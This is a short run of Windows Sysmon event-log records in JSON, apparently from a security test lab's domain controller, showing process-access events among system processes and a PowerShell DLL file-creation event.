{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5186,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5187,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5188,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5189,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5190,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5191,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5192,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5193,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5194,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:43.953\r\nProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nProcessId: 3064\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.dll\r\nCreationUtcTime: 2020-08-01 05:52:43.953","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:43.953","ProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.dll","CreationUtcTime":"2020-08-01 05:52:43.953","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
